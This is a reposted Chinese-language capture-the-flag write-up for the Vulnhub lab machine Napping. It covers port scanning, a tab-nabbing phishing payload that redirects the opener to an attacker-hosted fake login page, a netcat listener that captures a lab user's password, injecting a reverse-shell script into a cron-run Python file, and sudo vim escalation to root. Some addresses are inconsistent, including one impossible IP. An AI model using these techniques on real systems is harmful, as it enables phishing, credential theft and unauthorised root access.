ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 其他分享> 文章详细

[Vulnhub] 靶场 NAPPING: 1.0.1

2022-03-08 11:32:13  阅读:303  来源: 互联网

标签:1.0 NAPPING 端口 192.168 window html Vulnhub http 界面


前期准备

靶机下载地址:https://www.vulnhub.com/entry/red-1,753/
kali:192.168.147.178
靶机:192.168.147.185

一、信息收集

  • 1、扫描同网段存活服务器:

arp-scan -l
image

  • 2、nmap进行端口扫描。
nmap -A -p 1-65535 192.168.11.137
nmap -sV -O 192.168.147.185

image
发现80端口开启http服务,22端口开启ssh服务。

  • 3、访问80端口,收集页面信息。

image
发现是个登陆界面,可以注册,我们先注册登陆。
image
完成注册后,登陆进入界面,发现界面中间有个输入链接的输入框。
image
随便输入一个进行测试,提交之后发现可以点击here。
image
点击here以后,发现跳到hao123主页。我们查看页面源代码。
image
查看源代码,发现站点上的此特定 URL 链接功能容易受到Tab Nabbing钓鱼攻击。

二、漏洞攻击

  • 1、TABNabbing钓鱼利用

符合该漏洞利用条件,我们制作钓鱼页面,先将login登陆界面拷贝到本地。(注:为什么是拷贝index.php ,可以利用御剑扫描该网站,或者kali dirb http://192.168.147.185

image

  • 2、恶意界面的制作 sain.html
<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.147.178:8000/text1.html');
    	if(window.opener  != window) window.opener.parent.location.replace('http://192.168.11.178:8000/text1.html');
    </script>
</body>
</html>
  • 3、将制作的恶意界面和下载的index.php放到 /var/www/html,并且开启 python3-http 服务,开 80 端口,和sain.html 中的端口区分开

image
开机8000端口监听,nc -lvvp 8000 之后,在进行下列步骤。
image
稍等几分钟之后会获取到监听信息,得到用户名和密码。
image
image

靶机中设定的隔几分钟就会用用户登录,此时我们获取了数据包
username=daniel
password=C@ughtm3napping123

三、ssh登陆

ssh daniel@192.168.147.785     #ssh登陆daniel尝试,发现登陆成功

image
查看用户信息:
可以看到 daniel 是管理员组的一部分。
使用 find 我们可以查找任何我们可以使用命令访问的有趣文件
find / -group administrators -type f 2>/dev/nul
image
进入目录查看query.py脚本内容,发现对访问本地服务状态进行录入,不管成功与否都写入site_status.txt文件。猜测是个定时脚本。
image
查看site_status.txt,发现可能是2分钟执行一次该脚本。
image

四、提权

  • 我们发现脚本在adrian用户下定时执行,我们尝试获取adrian权限。所以我们在 /dev/shm 目录中创建一个反向 shell bash 脚本:

image
在query.py中加入运行该脚本代码。
image
在攻击机监听1234端口,等会得到反弹shell。
image
发现可以再没有在没有密码的情况下以 root 身份运行 vim ,获取root权限,那就直接写入vim shell

sudo /usr/bin/vim -c ':!/bin/sh'  
sudo vim -c ':!/bin/sh'

两个命令都可以获取到root权限。
image
参考了我关注的博主。

标签:1.0,NAPPING,端口,192.168,window,html,Vulnhub,http,界面
来源: https://www.cnblogs.com/2022zzt/p/15979673.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有